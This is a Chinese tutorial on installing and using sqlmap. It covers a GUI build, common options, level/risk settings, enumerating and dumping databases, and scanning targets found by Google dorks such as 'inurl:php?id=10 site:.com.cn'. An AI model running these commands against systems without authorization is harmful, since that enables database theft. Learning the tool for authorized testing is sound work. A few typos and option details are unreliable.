sqlmap使用以及GUI安装

下载

GUI版地址: GitHub - honmashironeko/sqlmap-gui: 基于官版本 SQLMAP 进行人工汉化,并提供GUI界面及多个自动化脚本

GUI使用

可以点击.bat启动

如果点击.bat启动不了就在这里打开cmd,输入对应的.bat来启动

linux安装

地址:sqlmap: automatic SQL injection and database takeover tool

选择.tar.gz文件

解压:tar -zxvf sqlmapproject-sqlmap-1.8.6-5-g6ae0d0f.tar.gz

取别名:alias sqlmap='/home/kali/sqlmap/sqlmapproject-sqlmap-6ae0d0f/sqlmap.py'

命令行使用

-u  指定URL-p  指定参数-v  指定显示级别--dbs  目标服务器中的数据库--current-db  当前数据库--tables  目标数据库有什么表--columns  目标表中有什么列--dump  获取数据--batch  跳过问询(yes)之间执行,批处理,在检测过程中会问用户一些问题,使用这个参数统统使用默认值--dbms  指定数据库类型--current-user  查看当前用户--users  查看所有用户--passwords  数据库密码--hostname  系统名称--banner  数据库信息--roles  数据库用户角色
判断注入点
# get方法
sqlmap -u "目标url+get参数"
# post方法
1.sqlmap -r 流量包文件.txt
2.sglmap -u "url" --data "post数据"
# 带cookie
sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low;PHPSESSID=ncoe0kgvdnq1l6755" --batch
# 设置等级
sqlmap -u "http://xxx:7777/Less-1/" --level=5 --risk=3


level 和 risk

在 SQLmap 中,level和risk是两个重要的选项,用于指定 SQL 注入检测和利用的深度和风险程度。
level选项用于指定检测的深度,取值范围为 1~5,数字越大,检测的深度越深,检测的速度越慢。
默认值为 1,表示最浅层的检测。risk选项用于指定检测和利用的风险程度,
取值范围为 0~3,数字越大,风险越高,检测和利用的方式越激进。默认值为 1,表示中等的风险程度。
在使用 SQLmap 时,根据实际情况选择合适的level和risk选项,可以提高检测和利用的效率和成功率,
同时避免对目标系统造成过多的影响和损害。

需要注意的是,level和risk选项虽然可以提高检测和利用的效率和成功率,但也会增加误报和误判的风险,
甚至可能引发系统崩溃和数据损坏等问题。因此,在使用这两个选项时,需要谨慎评估风险和影响,
并进行充分的测试和验证。同时,还需要遵守合法、合规、道德的原则,遵守法律法规,
并获得相关授权和许可,以避免违法和不当行为带来的法律和道德风险。

Sqlmap 一共有 5 个探测等级,默认是 1。等级越高,说明探测时使用的 payload 也越多。
其中 5 级的 payload 最多,会自动破解出 cookie、XFF 等头部注入。当然,等级越高,
探测的时间也越慢。这个参数会影响测试的注入点,GET 和 POST 的数据都会进行测试,
HTTP cookie在 level 为 2 时就会测试,HTTP User-Agent/Referer头在 level 为 3 时就会测试。
在不确定哪个参数为注入点时,为了保证准确性,建议设置 level 为5

sqlmap 一共有 3 个危险等级,也就是说你认为这个网站存在几级的危险等级。
和探测等级一个意思,在不确定的情况下,建议设置为 3 级
获取内容
# 获取数据库名
sqlmap -u 目标url+参数 --dbs
# 获取表名
sqlmap -u 目标 -D 库名 --tables
# 获取字段名
sqlmap -u 目标 -D 库名 -T 表名 --columns
# 获取字段值
sqlmap -u 目标 -D 库名 -T 表名 --dump #获取全部
sqlmap -u 目标 -D 库名 -T 表名 -C "字段1,字段2,.." --dump #获取指定
文件读取
Sqlmap支持从不同类型的文件中读取目标进行Sql注入探测

-l从Burpsuite proxy或WebScarab proxy中读取Http请求日志文件

-×从sitemap.xml站点地图文件中读取目标探测。

-m从多行文本格式文件读取多个目标,对多个目标进行探测。

-r从文本文件中读取Http请求作为Sql注入探测的目标。

-c从配置文件sqlmap.conf中读取目标探测。
对google进行扫描
Sqlmap通过-g自动利用Google获取指定Google hack的目杯,然后利用交互问导模式进行Sql注入探测。
例如:
python sqlmap.py -g "inurl:.php?id=1"
python sqlmap.py -g "inurl:php?id=10 site:.com.cn" --proxy"http://127.0.0.1:1080" --threads 5 --batch --answer "extending=N,follow=N,keep=N,exploit=n" --smart
相关推荐
xw-pp2 小时前
从输入 URL 到页面展示到底发生了什么?
网络协议·tcp/ip·http·网络安全·https·tcpdump
聪明的小脑袋瓜儿3 小时前
网络安全设备——防火墙
网络·web安全·网络安全·防火墙
wanhengwangluo4 小时前
徐州服务器租用:论带宽的作用有哪些
运维·网络安全·数据安全
亿林等保7 小时前
这些网络安全知识,请务必牢记!
网络安全
知攻善防实验室15 小时前
[护网训练]原创应急响应靶机整理集合
web安全·网络安全·黑客·渗透测试
这是另一个世界17 小时前
黑客技术大纲
网络·学习·web安全·网络安全
知孤云出岫21 小时前
网络漏洞挖掘实测报告
网络安全
金灰1 天前
日志自动分析-Web---360星图&Goaccess&ALB&Anolog
前端·安全·web安全·网络安全·系统安全·安全威胁分析
前端开发小司机1 天前
未公开 GeoServer开源服务器wfs远程命令执行漏洞 已复现(CVE-2024-36401)
服务器·网络·web安全·网络安全·开源·系统安全·安全威胁分析
只要学不死,就往死里学!1 天前
防火墙基础及登录(华为)
网络·网络安全·华为